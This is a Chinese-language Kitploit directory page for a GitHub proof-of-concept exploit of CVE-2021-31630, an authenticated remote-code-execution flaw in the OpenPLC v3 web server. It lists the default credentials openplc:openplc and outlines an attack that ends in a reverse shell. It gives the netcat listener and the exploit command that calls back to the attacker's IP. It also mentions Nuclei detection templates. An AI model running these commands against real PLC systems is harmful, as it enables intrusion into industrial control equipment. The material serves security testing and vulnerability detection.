Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OpenPLC-CVE-2021-31630-RCE — Python 3.13+ 概念验证漏洞利用,针对 CVE-2021-31630,通过恶意硬件层上传实现 OpenPLC v3 的已认证远程代码执行。包含用于默认凭据和漏洞检查的 Nuclei 检测模板。 | Kitploit
工具/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ 概念验证漏洞利用,针对 CVE-2021-31630,通过恶意硬件层上传实现 OpenPLC v3 的已认证远程代码执行。包含用于默认凭据和漏洞检查的 Nuclei 检测模板。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
3251年前尚未审核
分享

OpenPLC v3 认证远程代码执行 (CVE-2021-31630)

这是一个现代 Python 3.13+ 兼容的概念验证漏洞利用程序,用于 CVE-2021-31630,该漏洞存在于 OpenPLC v3 中,允许认证用户上传包含恶意代码的自定义硬件层,从而导致在主机上远程执行代码(RCE)。

原始漏洞发现和报告由 Fellipe Oliveira 提供。 此重新实现和现代化版本使用 httpx、CLI 工具、日志记录和更安全的检测技术。

漏洞利用概述

  • 漏洞:CVE-2021-31630
  • 组件:OpenPLC v3 Web 服务器
  • 影响:认证远程代码执行 (RCE)
  • 默认凭据:openplc:openplc

漏洞利用流程

  1. 使用有效凭据登录
  2. 上传恶意C代码作为自定义硬件层
  3. 触发编译
  4. 触发执行(可选)
  5. 接收反弹 Shell 连接

使用方法

  1. 启动监听器:
root@kitploit:~
nc -lvnp 9001
  1. 运行漏洞利用程序:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

可选参数:

  • -u 用户名(默认:openplc)
  • -p 密码(默认:openplc)
  • -t 超时时间(秒,默认:20)

功能特性

  • 兼容 Python 3.13+
  • 使用 httpx 构建
  • 日志支持,输出清晰
  • 模块化函数,便于重用
  • 包含 Nuclei 检测模板
  • Nuclei 检测模板

    1. 默认凭据检查
    root@kitploit:~
    nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
    
    1. 被动 RCE 漏洞检查
    root@kitploit:~
    nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080
    

    第二个模板会登录并尝试无害的有效载荷上传+编译,以确认可能存在的漏洞——而不会触发实际的代码执行。

    包含的文件

    • OpenPLC_CVE_2021_31630.py – Python 3.13+ 漏洞利用程序
    • nuclei-templates/openplc-default-login.yaml – 检测默认凭据
    • nuclei-templates/openplc-authenticated-rce-check.yaml – 安全检测脆弱行为

    ⚠️ 法律/伦理

    此代码仅供教育和授权的安全测试使用。 未经系统所有者明确许可,不得使用。

    下载工具